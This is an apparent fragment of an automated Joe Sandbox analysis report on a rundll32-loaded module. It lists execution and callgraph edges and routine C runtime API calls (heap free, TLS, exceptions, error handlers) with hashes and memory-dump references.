54 API calls 1857->1858 1858->1855 1859->1856 1862 4c2f361 1860->1862 1863 4c18bc4 _free 54 API calls 1860->1863 1861->1860 1864 4c2f373 1862->1864 1866 4c18bc4 _free 54 API calls 1862->1866 1863->1862 1865 4c2f385 1864->1865 1867 4c18bc4 _free 54 API calls 1864->1867 1868 4c2f397 1865->1868 1869 4c18bc4 _free 54 API calls 1865->1869 1866->1864 1867->1865 1870 4c2f3a9 1868->1870 1871 4c18bc4 _free 54 API calls 1868->1871 1869->1868 1872 4c2f3bb 1870->1872 1873 4c18bc4 _free 54 API calls 1870->1873 1871->1870 1874 4c18bc4 _free 54 API calls 1872->1874 1872->1875 1873->1872 1874->1875 1875->1832 1877 4c2f7d5 1876->1877 1878 4c2f77d 1876->1878 1877->1847 1879 4c2f78d 1878->1879 1880 4c18bc4 _free 54 API calls 1878->1880 1881 4c2f79f 1879->1881 1882 4c18bc4 _free 54 API calls 1879->1882 1880->1879 1883 4c2f7b1 1881->1883 1884 4c18bc4 _free 54 API calls 1881->1884 1882->1881 1885 4c2f7c3 1883->1885 1886 4c18bc4 _free 54 API calls 1883->1886 1884->1883 1885->1877 1887 4c18bc4 _free 54 API calls 1885->1887 1886->1885 1887->1877 1889 4c2f9ee 1888->1889 1890 4c26dcd 1888->1890 1891 4c18bc4 _free 54 API calls 1889->1891 1890->1828 1892 4c2f9f6 1891->1892 1893 4c18bc4 _free 54 API calls 1892->1893 1894 4c2f9fe 1893->1894 1895 4c18bc4 _free 54 API calls 1894->1895 1896 4c2fa06 1895->1896 1897 4c18bc4 _free 54 API calls 1896->1897 1898 4c2fa0e 1897->1898 1899 4c18bc4 _free 54 API calls 1898->1899 1900 4c2fa16 1899->1900 1901 4c18bc4 _free 54 API calls 1900->1901 1902 4c2fa1e 1901->1902 1903 4c18bc4 _free 54 API calls 1902->1903 1904 4c2fa25 1903->1904 1905 4c18bc4 _free 54 API calls 1904->1905 1906 4c2fa2d 1905->1906 1907 4c18bc4 _free 54 API calls 1906->1907 1908 4c2fa35 1907->1908 1909 4c18bc4 _free 54 API calls 1908->1909 1910 4c2fa3d 1909->1910 1911 4c18bc4 _free 54 API calls 1910->1911 1912 4c2fa45 1911->1912 1913 4c18bc4 _free 54 API calls 1912->1913 1914 4c2fa4d 1913->1914 1915 4c18bc4 _free 54 API calls 1914->1915 1916 4c2fa55 1915->1916 1917 4c18bc4 _free 54 API calls 1916->1917 1918 4c2fa5d 1917->1918 1919 4c18bc4 _free 54 API calls 1918->1919 1920 4c2fa65 1919->1920 1921 4c18bc4 _free 54 API calls 1920->1921 1922 4c2fa6d 1921->1922 1923 4c18bc4 _free 54 API calls 1922->1923 1924 4c2fa78 1923->1924 1925 4c18bc4 _free 54 API calls 1924->1925 1926 4c2fa80 1925->1926 1927 4c18bc4 _free 54 API calls 1926->1927 1928 4c2fa88 1927->1928 1929 4c18bc4 _free 54 API calls 1928->1929 1930 4c2fa90 1929->1930 1931 4c18bc4 _free 54 API calls 1930->1931 1932 4c2fa98 1931->1932 1933 4c18bc4 _free 54 API calls 1932->1933 1934 4c2faa0 1933->1934 1935 4c18bc4 _free 54 API calls 1934->1935 1936 4c2faa8 1935->1936 1937 4c18bc4 _free 54 API calls 1936->1937 1938 4c2fab0 1937->1938 1939 4c18bc4 _free 54 API calls 1938->1939 1940 4c2fab8 1939->1940 1941 4c18bc4 _free 54 API calls 1940->1941 1942 4c2fac0 1941->1942 1943 4c18bc4 _free 54 API calls 1942->1943 1944 4c2fac8 1943->1944 1945 4c18bc4 _free 54 API calls 1944->1945 1946 4c2fad0 1945->1946 1947 4c18bc4 _free 54 API calls 1946->1947 1948 4c2fad8 1947->1948 1949 4c18bc4 _free 54 API calls 1948->1949 1950 4c2fae0 1949->1950 1951 4c18bc4 _free 54 API calls 1950->1951 1952 4c2fae8 1951->1952 1953 4c18bc4 _free 54 API calls 1952->1953 1954 4c2faf0 1953->1954 1955 4c18bc4 _free 54 API calls 1954->1955 1956 4c2fafe 1955->1956 1957 4c18bc4 _free 54 API calls 1956->1957 1958 4c2fb09 1957->1958 1959 4c18bc4 _free 54 API calls 1958->1959 1960 4c2fb14 1959->1960 1961 4c18bc4 _free 54 API calls 1960->1961 1962 4c2fb1f 1961->1962 1963 4c18bc4 _free 54 API calls 1962->1963 1964 4c2fb2a 1963->1964 1965 4c18bc4 _free 54 API calls 1964->1965 1966 4c2fb35 1965->1966 1967 4c18bc4 _free 54 API calls 1966->1967 1968 4c2fb40 1967->1968 1969 4c18bc4 _free 54 API calls 1968->1969 1970 4c2fb4b 1969->1970 1971 4c18bc4 _free 54 API calls 1970->1971 1972 4c2fb56 1971->1972 1973 4c18bc4 _free 54 API calls 1972->1973 1974 4c2fb61 1973->1974 1975 4c18bc4 _free 54 API calls 1974->1975 1976 4c2fb6c 1975->1976 1977 4c18bc4 _free 54 API calls 1976->1977 1978 4c2fb77 1977->1978 1979 4c18bc4 _free 54 API calls 1978->1979 1980 4c2fb82 1979->1980 1981 4c18bc4 _free 54 API calls 1980->1981 1982 4c2fb8d 1981->1982 1983 4c18bc4 _free 54 API calls 1982->1983 1984 4c2fb98 1983->1984 1985 4c18bc4 _free 54 API calls 1984->1985 1986 4c2fba3 1985->1986 1987 4c18bc4 _free 54 API calls 1986->1987 1988 4c2fbb1 1987->1988 1989 4c18bc4 _free 54 API calls 1988->1989 1990 4c2fbbc 1989->1990 1991 4c18bc4 _free 54 API calls 1990->1991 1992 4c2fbc7 1991->1992 1993 4c18bc4 _free 54 API calls 1992->1993 1994 4c2fbd2 1993->1994 1995 4c18bc4 _free 54 API calls 1994->1995 1996 4c2fbdd 1995->1996 1997 4c18bc4 _free 54 API calls 1996->1997 1998 4c2fbe8 1997->1998 1999 4c18bc4 _free 54 API calls 1998->1999 2000 4c2fbf3 1999->2000 2001 4c18bc4 _free 54 API calls 2000->2001 2002 4c2fbfe 2001->2002 2003 4c18bc4 _free 54 API calls 2002->2003 2004 4c2fc09 2003->2004 2005 4c18bc4 _free 54 API calls 2004->2005 2006 4c2fc14 2005->2006 2007 4c18bc4 _free 54 API calls 2006->2007 2008 4c2fc1f 2007->2008 2009 4c18bc4 _free 54 API calls 2008->2009 2010 4c2fc2a 2009->2010 2011 4c18bc4 _free 54 API calls 2010->2011 2012 4c2fc35 2011->2012 2013 4c18bc4 _free 54 API calls 2012->2013 2014 4c2fc40 2013->2014 2015 4c18bc4 _free 54 API calls 2014->2015 2016 4c2fc4b 2015->2016 2017 4c18bc4 _free 54 API calls 2016->2017 2018 4c2fc56 2017->2018 2019 4c18bc4 _free 54 API calls 2018->2019 2020 4c2fc64 2019->2020 2021 4c18bc4 _free 54 API calls 2020->2021 2022 4c2fc6f 2021->2022 2023 4c18bc4 _free 54 API calls 2022->2023 2024 4c2fc7a 2023->2024 2025 4c18bc4 _free 54 API calls 2024->2025 2026 4c2fc85 2025->2026 2027 4c18bc4 _free 54 API calls 2026->2027 2028 4c2fc90 2027->2028 2029 4c18bc4 _free 54 API calls 2028->2029 2030 4c2fc9b 2029->2030 2031 4c18bc4 _free 54 API calls 2030->2031 2032 4c2fca6 2031->2032 2033 4c18bc4 _free 54 API calls 2032->2033 2034 4c2fcb1 2033->2034 2035 4c18bc4 _free 54 API calls 2034->2035 2036 4c2fcbc 2035->2036 2037 4c18bc4 _free 54 API calls 2036->2037 2038 4c2fcc7 2037->2038 2039 4c18bc4 _free 54 API calls 2038->2039 2040 4c2fcd2 2039->2040 2041 4c18bc4 _free 54 API calls 2040->2041 2042 4c2fcdd 2041->2042 2043 4c18bc4 _free 54 API calls 2042->2043 2044 4c2fce8 2043->2044 2045 4c18bc4 _free 54 API calls 2044->2045 2046 4c2fcf3 2045->2046 2047 4c18bc4 _free 54 API calls 2046->2047 2048 4c2fcfe 2047->2048 2049 4c18bc4 _free 54 API calls 2048->2049 2050 4c2fd09 2049->2050 2051 4c18bc4 _free 54 API calls 2050->2051 2052 4c2fd17 2051->2052 2053 4c18bc4 _free 54 API calls 2052->2053 2054 4c2fd22 2053->2054 2055 4c18bc4 _free 54 API calls 2054->2055 2056 4c2fd2d 2055->2056 2057 4c18bc4 _free 54 API calls 2056->2057 2058 4c2fd38 2057->2058 2059 4c18bc4 _free 54 API calls 2058->2059 2060 4c2fd43 2059->2060 2061 4c18bc4 _free 54 API calls 2060->2061 2062 4c2fd4e 2061->2062 2063 4c18bc4 _free 54 API calls 2062->2063 2063->1890 2064->1817 2068 4c1f7c4 LeaveCriticalSection 2065->2068 2067 4c29bfc 2067->1805 2068->2067 2070 4c20883 2069->2070 2071 4c20894 2069->2071 2070->2071 2072 4c18bc4 _free 54 API calls 2070->2072 2071->1772 2072->2071 1420 4c20897 1422 4c2089e 1420->1422 1423 4c208d9 1422->1423 1425 4c208bc 1422->1425 1426 4c2b30e 1422->1426 1425->1422 1425->1423 1433 4c21181 Sleep 1425->1433 1427 4c2b319 1426->1427 1432 4c2b334 1426->1432 1428 4c2b325 1427->1428 1427->1432 1434 4c18edb 1428->1434 1430 4c2b344 RtlAllocateHeap 1431 4c2b32a 1430->1431 1430->1432 1431->1422 1432->1430 1432->1431 1433->1425 1437 4c24546 GetLastError 1434->1437 1436 4c18ee0 1436->1431 1451 4c20e47 1437->1451 1439 4c2455b 1440 4c245a9 SetLastError 1439->1440 1454 4c20897 1439->1454 1440->1436 1444 4c24582 1445 4c245a0 1444->1445 1446 4c24588 1444->1446 1473 4c18bc4 1445->1473 1463 4c245b5 1446->1463 1449 4c24590 GetCurrentThreadId 1449->1440 1450 4c245a6 1450->1440 1452 4c20e5e TlsGetValue 1451->1452 1453 4c20e5a 1451->1453 1452->1439 1453->1439 1456 4c2089e 1454->1456 1455 4c2b30e __calloc_impl 54 API calls 1455->1456 1456->1455 1457 4c208d9 1456->1457 1459 4c208bc 1456->1459 1457->1440 1460 4c20e66 1457->1460 1459->1456 1459->1457 1479 4c21181 Sleep 1459->1479 1461 4c20e80 TlsSetValue 1460->1461 1462 4c20e7c 1460->1462 1461->1444 1462->1444 1464 4c245c1 __mtinitlocknum 1463->1464 1480 4c1f65a 1464->1480 1466 4c245fe 1487 4c24656 1466->1487 1469 4c1f65a __mtinitlocknum 54 API calls 1470 4c2461f ___addlocaleref 1469->1470 1490 4c2465f 1470->1490 1472 4c2464a __mtinitlocknum 1472->1449 1474 4c18bf6 _free 1473->1474 1475 4c18bcd RtlFreeHeap 1473->1475 1474->1450 1475->1474 1476 4c18be2 1475->1476 1477 4c18edb _free 52 API calls 1476->1477 1478 4c18be8 GetLastError 1477->1478 1478->1474 1479->1459 1481 4c1f66b 1480->1481 1482 4c1f67e EnterCriticalSection 1480->1482 1493 4c1f6e2 1481->1493 1482->1466 1484 4c1f671 1484->1482 1517 4c2308a 1484->1517 1691 4c1f7c4 LeaveCriticalSection 1487->1691 1489 4c24618 1489->1469 1692 4c1f7c4 LeaveCriticalSection 1490->1692 1492 4c24666 1492->1472 1494 4c1f6ee __mtinitlocknum 1493->1494 1495 4c1f6f7 1494->1495 1496 4c1f70f 1494->1496 1531 4c26a3a 1495->1531 1501 4c1f730 __mtinitlocknum 1496->1501 1526 4c208df 1496->1526 1501->1484 1503 4c1f72b 1506 4c18edb _free 54 API calls 1503->1506 1504 4c1f73a 1507 4c1f65a __mtinitlocknum 54 API calls 1504->1507 1505 4c1f703 1568 4c22f67 1505->1568 1506->1501 1509 4c1f741 1507->1509 1511 4c1f766 1509->1511 1512 4c1f74e 1509->1512 1514 4c18bc4 _free 54 API calls 1511->1514 1571 4c20e88 1512->1571 1515 4c1f75a 1514->1515 1574 4c1f782 1515->1574 1518 4c26a3a __FF_MSGBANNER 54 API calls 1517->1518 1519 4c23092 1518->1519 1520 4c26a97 __NMSG_WRITE 54 API calls 1519->1520 1521 4c2309a 1520->1521 1661 4c23139 1521->1661 1525 4c1f67d 1525->1482 1528 4c208ed 1526->1528 1527 4c1f724 1527->1503 1527->1504 1528->1527 1530 4c20900 1528->1530 1530->1527 1530->1528 1577 4c21181 Sleep 1530->1577 1578 4c2f0af 1531->1578 1533 4c26a41 1534 4c2f0af __NMSG_WRITE 54 API calls 1533->1534 1536 4c26a4e 1533->1536 1534->1536 1535 4c26a97 __NMSG_WRITE 54 API calls 1537 4c26a66 1535->1537 1536->1535 1538 4c1f6fc 1536->1538 1539 4c26a97 __NMSG_WRITE 54 API calls 1537->1539 1540 4c26a97 1538->1540 1539->1538 1541 4c26ab5 __NMSG_WRITE 1540->1541 1542 4c26bdc 1541->1542 1543 4c2f0af __NMSG_WRITE 51 API calls 1541->1543 1542->1505 1544 4c26ac8 1543->1544 1545 4c26be1 GetStdHandle 1544->1545 1547 4c2f0af __NMSG_WRITE 51 API calls 1544->1547 1545->1542 1546 4c26bef _strlen 1545->1546 1546->1542 1551 4c26c28 WriteFile 1546->1551 1548 4c26ad9 1547->1548 1548->1545 1549 4c26aeb 1548->1549 1549->1542 1594 4c2d3d6 1549->1594 1551->1542 1553 4c26b18 GetModuleFileNameW 1555 4c26b38 1553->1555 1559 4c26b48 __NMSG_WRITE 1553->1559 1554 4c26c49 1644 4c24398 IsProcessorFeaturePresent 1554->1644 1557 4c2d3d6 __NMSG_WRITE 51 API calls 1555->1557 1557->1559 1559->1554 1560 4c26b8e 1559->1560 1603 4c2eff1 1559->1603 1560->1554 1612 4c2ef85 1560->1612 1564 4c2ef85 __NMSG_WRITE 51 API calls 1565 4c26bc5 1564->1565 1565->1554 1566 4c26bcc 1565->1566 1621 4c2f0ef EncodePointer 1566->1621 1657 4c22f33 GetModuleHandleExW 1568->1657 1572 4c20ea5 InitializeCriticalSectionAndSpinCount 1571->1572 1573 4c20e98 1571->1573 1572->1515 1573->1515 1660 4c1f7c4 LeaveCriticalSection 1574->1660 1576 4c1f789 1576->1501 1577->1530 1580 4c2f0b9 1578->1580 1579 4c2f0c3 1579->1533 1580->1579 1581 4c18edb _free 54 API calls 1580->1581 1582 4c2f0df 1581->1582 1585 4c24388 1582->1585 1588 4c2435d DecodePointer 1585->1588 1589 4c24370 1588->1589 1590 4c24398 __invoke_watson 6 API calls 1589->1590 1591 4c24387 1590->1591 1592 4c2435d __NMSG_WRITE 6 API calls 1591->1592 1593 4c24394 1592->1593 1593->1533 1595 4c2d3ef 1594->1595 1596 4c2d3e1 1594->1596 1597 4c18edb _free 54 API calls 1595->1597 1596->1595 1601 4c2d408 1596->1601 1598 4c2d3f9 1597->1598 1599 4c24388 __NMSG_WRITE 7 API calls 1598->1599 1600 4c26b0b 1599->1600 1600->1553 1600->1554 1601->1600 1602 4c18edb _free 54 API calls 1601->1602 1602->1598 1604 4c2efff 1603->1604 1606 4c2f008 1604->1606 1608 4c2f003 1604->1608 1610 4c2f042 1604->1610 1605 4c18edb _free 54 API calls 1607 4c2f033 1605->1607 1606->1560 1609 4c24388 __NMSG_WRITE 7 API calls 1607->1609 1608->1605 1608->1606 1609->1606 1610->1606 1611 4c18edb _free 54 API calls 1610->1611 1611->1607 1613 4c2ef9f 1612->1613 1616 4c2ef91 1612->1616 1614 4c18edb _free 54 API calls 1613->1614 1615 4c2efa9 1614->1615 1617 4c24388 __NMSG_WRITE 7 API calls 1615->1617 1616->1613 1619 4c2efcb 1616->1619 1618 4c26bae 1617->1618 1618->1554 1618->1564 1619->1618 1620 4c18edb _free 54 API calls 1619->1620 1620->1615 1622 4c2f123 ___crtIsPackagedApp 1621->1622 1623 4c2f1e2 IsDebuggerPresent 1622->1623 1624 4c2f132 LoadLibraryExW 1622->1624 1625 4c2f207 1623->1625 1626 4c2f1ec 1623->1626 1627 4c2f149 GetLastError 1624->1627 1628 4c2f16f GetProcAddress 1624->1628 1630 4c2f1fa 1625->1630 1631 4c2f20c DecodePointer 1625->1631 1629 4c2f1f3 OutputDebugStringW 1626->1629 1626->1630 1632 4c2f158 LoadLibraryExW 1627->1632 1634 4c2f1ff 1627->1634 1633 4c2f183 7 API calls 1628->1633 1628->1634 1629->1630 1630->1634 1638 4c2f233 DecodePointer DecodePointer 1630->1638 1641 4c2f24b 1630->1641 1631->1634 1632->1628 1632->1634 1635 4c2f1cb GetProcAddress EncodePointer 1633->1635 1636 4c2f1df 1633->1636 1634->1542 1635->1636 1636->1623 1637 4c2f283 DecodePointer 1640 4c2f28a 1637->1640 1642 4c2f26f DecodePointer 1637->1642 1638->1641 1640->1642 1643 4c2f29b DecodePointer 1640->1643 1641->1637 1641->1642 1642->1634 1643->1642 1645 4c243a3 1644->1645 1650 4c2422b 1645->1650 1647 4c243b8 1655 4c2118f GetCurrentProcess TerminateProcess 1647->1655 1649 4c243be 1651 4c24245 _memset __call_reportfault 1650->1651 1652 4c24265 IsDebuggerPresent 1651->1652 1656 4c211a4 SetUnhandledExceptionFilter UnhandledExceptionFilter 1652->1656 1654 4c24329 __call_reportfault 1654->1647 1655->1649 1656->1654 1658 4c22f5e ExitProcess 1657->1658 1659 4c22f4c GetProcAddress 1657->1659 1659->1658 1660->1576 1662 4c231ef _doexit 54 API calls 1661->1662 1663 4c230a5 1662->1663 1664 4c231ef 1663->1664 1665 4c231fb __mtinitlocknum 1664->1665 1666 4c1f65a __mtinitlocknum 47 API calls 1665->1666 1667 4c23202 1666->1667 1668 4c232bb __initterm 1667->1668 1670 4c23230 DecodePointer 1667->1670 1684 4c23309 1668->1684 1670->1668 1672 4c23247 DecodePointer 1670->1672 1677 4c23257 1672->1677 1673 4c23318 __mtinitlocknum 1673->1525 1675 4c23264 EncodePointer 1675->1677 1676 4c23300 1678 4c22f67 __mtinitlocknum 3 API calls 1676->1678 1677->1668 1677->1675 1679 4c23274 DecodePointer EncodePointer 1677->1679 1680 4c23309 1678->1680 1682 4c23286 DecodePointer DecodePointer 1679->1682 1681 4c23316 1680->1681 1689 4c1f7c4 LeaveCriticalSection 1680->1689 1681->1525 1682->1677 1685 4c232e9 1684->1685 1686 4c2330f 1684->1686 1685->1673 1688 4c1f7c4 LeaveCriticalSection 1685->1688 1690 4c1f7c4 LeaveCriticalSection 1686->1690 1688->1676 1689->1681 1690->1685 1691->1489 1692->1492 1693 4c03828 1694 4c03843 std::exception::exception 1693->1694 1699 4c1e762 1694->1699 1696 4c03858 Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 1697 4c1e762 __CxxThrowException@8 RaiseException 1696->1697 1698 4c0387c 1697->1698 1701 4c1e781 RaiseException 1699->1701 1701->1696 2073 4c0387d 2074 4c03895 2073->2074 2075 4c1e762 __CxxThrowException@8 RaiseException 2074->2075 2076 4c038aa 2075->2076 2077 4c1e762 __CxxThrowException@8 RaiseException 2076->2077 2078 4c038d8 std::regex_error::regex_error 2077->2078 2079 4c1e762 __CxxThrowException@8 RaiseException 2078->2079 2080 4c038f8 2079->2080 2081 4c1e762 __CxxThrowException@8 RaiseException 2080->2081 2082 4c03926 2081->2082

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_04C2E1C6 14 Function_04C2E0E2 0->14 100 Function_04C1CA16 0->100 1 Function_04C1F7C4 2 Function_04C18BC4 10 Function_04C18EDB 2->10 23 Function_04C18EEE 2->23 3 Function_04C192C9 4 Function_04BF88B0 22 Function_04BF8890 4->22 5 Function_04B890AA 6 Function_04B796A3 7 Function_04C2D3D6 7->10 36 Function_04C24388 7->36 8 Function_04C2F2D5 8->2 9 Function_04C1F7D9 27 Function_04C1E8F5 9->27 43 Function_04C23395 9->43 65 Function_04C23350 9->65 61 Function_04C24546 10->61 11 Function_04C2F9DF 11->2 12 Function_04C208DF 30 Function_04C21181 12->30 13 Function_04BF8FA0 39 Function_04BFA6F0 13->39 59 Function_04C2D440 14->59 87 Function_04C20879 14->87 103 Function_04C22C29 14->103 15 Function_04C26EE3 34 Function_04C2308A 15->34 15->43 15->65 68 Function_04C26F5A 15->68 70 Function_04C1F65A 15->70 75 Function_04C26F63 15->75 105 Function_04C2452E 15->105 16 Function_04C1F6E2 16->2 16->10 16->12 31 Function_04C1F782 16->31 35 Function_04C20E88 16->35 42 Function_04C26A97 16->42 16->43 16->65 16->70 78 Function_04C22F67 16->78 110 Function_04C26A3A 16->110 17 Function_04B21396 18 Function_04C30FE5 19 Function_04C26CE9 19->2 19->8 19->11 82 Function_04C2F772 19->82 20 Function_04C2F0EF 56 Function_04C20EB6 20->56 21 Function_04C231EF 21->1 33 Function_04C23185 21->33 21->43 21->65 21->70 21->78 97 Function_04C23309 21->97 54 Function_04BFB5D0 22->54 24 Function_04C2DEF0 25 Function_04C364F0 26 Function_04C2EFF1 26->10 26->36 28 Function_04C29BF5 28->1 29 Function_04BD3DFE 31->1 32 Function_04C2EF85 32->10 32->36 34->21 34->42 34->110 111 Function_04C23139 34->111 73 Function_04C2435D 36->73 37 Function_04C18C8B 38 Function_04C2118F 39->6 45 Function_04B1DAEE 39->45 52 Function_04B1DADA 39->52 40 Function_04C27492 41 Function_04C20897 41->30 98 Function_04C2B30E 41->98 42->7 42->20 42->26 42->32 42->37 44 Function_04C24398 42->44 53 Function_04C2F0AF 42->53 83 Function_04C26A73 42->83 90 Function_04C18C00 42->90 44->38 102 Function_04C2422B 44->102 46 Function_04BF94DE 46->4 46->13 46->17 109 Function_04B13A45 46->109 47 Function_04B1DAD0 48 Function_04C274A6 49 Function_04C211A4 50 Function_04C1F1A6 51 Function_04C274AB 84 Function_04C27370 51->84 53->10 53->36 106 Function_04BFA750 54->106 55 Function_04C233B0 55->0 55->2 55->40 55->41 55->44 55->51 60 Function_04C2DF40 55->60 74 Function_04C27462 55->74 86 Function_04C27479 55->86 55->103 112 Function_04C2E03E 55->112 57 Function_04C245B5 57->43 57->65 66 Function_04C24656 57->66 67 Function_04C26C54 57->67 57->70 71 Function_04C2465F 57->71 58 Function_04C26E43 60->24 92 Function_04C2E000 60->92 61->2 61->41 61->57 62 Function_04C20E47 61->62 77 Function_04C20E66 61->77 63 Function_04B13E3B 64 Function_04B01120 66->1 68->1 69 Function_04C29B58 69->2 69->28 69->34 69->43 69->65 69->70 69->105 70->16 70->34 71->1 72 Function_04BF9320 73->44 73->73 75->19 75->58 75->67 76 Function_04C1E762 108 Function_04C22F33 78->108 79 Function_04C22B65 80 Function_04C03768 81 Function_04C34968 82->2 84->18 95 Function_04C31004 84->95 85 Function_04B1510B 89 Function_04B13C0E 85->89 86->18 87->2 88 Function_04C0387D 88->76 96 Function_04C03708 88->96 91 Function_04C2E200 93 Function_04C27400 93->84 94 Function_04C19307 96->80 97->1 98->10 99 Function_04B79166 100->15 100->69 100->105 101 Function_04C03828 101->3 101->76 101->94 102->49 102->91 107 Function_04C19130 102->107 103->79 104 Function_04B89854 105->34 105->61 106->45 106->47 106->52 106->99 109->63 110->42 110->53 111->21 112->10 112->36

    Control-flow Graph

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,04C24329,?,?,?,00000001), ref: 04C211A9
    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 04C211B2
    Memory Dump Source
    • Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true
    • Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: b9d289011fe102815e3a224543025ab0bb5fd1d13a050b73ea5178d849ead2f0
    • Instruction ID: cd153c15ee159e209089359cff9a0f2f3035d3f94bf2c6b00b759a3efbbfd727
    • Opcode Fuzzy Hash: b9d289011fe102815e3a224543025ab0bb5fd1d13a050b73ea5178d849ead2f0
    • Instruction Fuzzy Hash: 09B09232054288ABCA002BD1F80AF9CBF28EB96662F000020F60E44060AFAA9452DA91
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,04C236FA,?,?,?,00000002,?,?,?), ref: 04C22C50
    Memory Dump Source
    • Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true
    • Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: fc44149cc06684d1cbd96dca6b09dd7aad81e68566ec0e58ca7c659674dab770
    • Instruction ID: 6a4dc0a13bc01d326b5b554b3d9d73a4b2de4c091bfa931ac64bdd11bc15ac73
    • Opcode Fuzzy Hash: fc44149cc06684d1cbd96dca6b09dd7aad81e68566ec0e58ca7c659674dab770
    • Instruction Fuzzy Hash: EDD01736000108BF9F019FE0E806C6E3F6AFB49324B084845F91885010DA76A5209B65

    Control-flow Graph

    APIs
    • __CxxThrowException@8.LIBCMT ref: 04C038A5
      • Part of subcall function 04C1E762: RaiseException.KERNEL32(?,?,04C038AA,?,?,?,?,?,?,?,04C038AA,?,04C58510,?), ref: 04C1E7B7
    • __CxxThrowException@8.LIBCMT ref: 04C038D3
    • std::regex_error::regex_error.LIBCPMT ref: 04C038E5
    • __CxxThrowException@8.LIBCMT ref: 04C038F3
    • __CxxThrowException@8.LIBCMT ref: 04C03921
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1337569257.0000000004B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 04B00000, based on PE: true
    • Associated: 00000005.00000002.1337548066.0000000004B00000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1337670304.0000000004C5A000.00000004.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338073948.00000000050CD000.00000002.00001000.00020000.00000000.sdmpDownload File
    • Associated: 00000005.00000002.1338097794.00000000050CF000.00000040.00001000.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_4b00000_rundll32.jbxd
    Similarity
    • API ID: Exception@8Throw$ExceptionRaisestd::regex_error::regex_error
    • String ID: AhxBPOGHKhAzyzIZP
    • API String ID: 3461588268-3120880352
    • Opcode ID: ca61aedb3352fd58176324055722c7893f2802d51637fd0525e6e5843ddd536a
    • Instruction ID: 877b21ad5fec6d28ec6168a5a7a733e596b47bfacd952060a2238657d62ed536
    • Opcode Fuzzy Hash: ca61aedb3352fd58176324055722c7893f2802d51637fd0525e6e5843ddd536a
    • Instruction Fuzzy Hash: DE11EC75C0020CBBAF04EFA4C4598DDBBBDEA14648B408466ED2497650EA34F7499F95

    Execution Graph

    Execution Coverage:0.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:570
    Total number of Limit Nodes:2
    execution_graph 2064 4bb3828 2065 4bb3843 std::exception::exception 2064->2065 2066 4bce762 __CxxThrowException@8 RaiseException 2065->2066 2067 4bb3858 Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 2066->2067 2068 4bce762 __CxxThrowException@8 RaiseException 2067->2068 2069 4bb387c 2068->2069 1680 4bb387d 1681 4bb3895 1680->1681 1690 4bce762 1681->1690 1683 4bb38aa 1684 4bce762 __CxxThrowException@8 RaiseException 1683->1684 1685 4bb38d8 std::regex_error::regex_error 1684->1685 1686 4bce762 __CxxThrowException@8 RaiseException 1685->1686 1687 4bb38f8 1686->1687 1688 4bce762 __CxxThrowException@8 RaiseException 1687->1688 1689 4bb3926 1688->1689 1691 4bce781 RaiseException 1690->1691 1691->1683 1419 4bc8bc4 1420 4bc8bcd RtlFreeHeap 1419->1420 1421 4bc8bf6 _free 1419->1421 1420->1421 1422 4bc8be2 1420->1422 1425 4bc8edb 1422->1425 1428 4bd4546 GetLastError 1425->1428 1427 4bc8be8 GetLastError 1427->1421 1442 4bd0e47 1428->1442 1430 4bd455b 1431 4bd45a9 SetLastError 1430->1431 1445 4bd0897 1430->1445 1431->1427 1435 4bd4582 1436 4bd4588 1435->1436 1437 4bd45a0 1435->1437 1453 4bd45b5 1436->1453 1463 4bc8bc4 1437->1463 1440 4bd45a6 1440->1431 1441 4bd4590 GetCurrentThreadId 1441->1431 1443 4bd0e5e TlsGetValue 1442->1443 1444 4bd0e5a 1442->1444 1443->1430 1444->1430 1449 4bd089e 1445->1449 1447 4bd08d9 1447->1431 1450 4bd0e66 1447->1450 1449->1447 1469 4bdb30e 1449->1469 1476 4bd1181 Sleep 1449->1476 1451 4bd0e7c 1450->1451 1452 4bd0e80 TlsSetValue 1450->1452 1451->1435 1452->1435 1454 4bd45c1 _doexit 1453->1454 1477 4bcf65a 1454->1477 1456 4bd45fe 1484 4bd4656 1456->1484 1459 4bcf65a _doexit 54 API calls 1460 4bd461f ___addlocaleref 1459->1460 1487 4bd465f 1460->1487 1462 4bd464a _doexit 1462->1441 1464 4bc8bcd RtlFreeHeap 1463->1464 1465 4bc8bf6 _free 1463->1465 1464->1465 1466 4bc8be2 1464->1466 1465->1440 1467 4bc8edb __mtinitlocknum 52 API calls 1466->1467 1468 4bc8be8 GetLastError 1467->1468 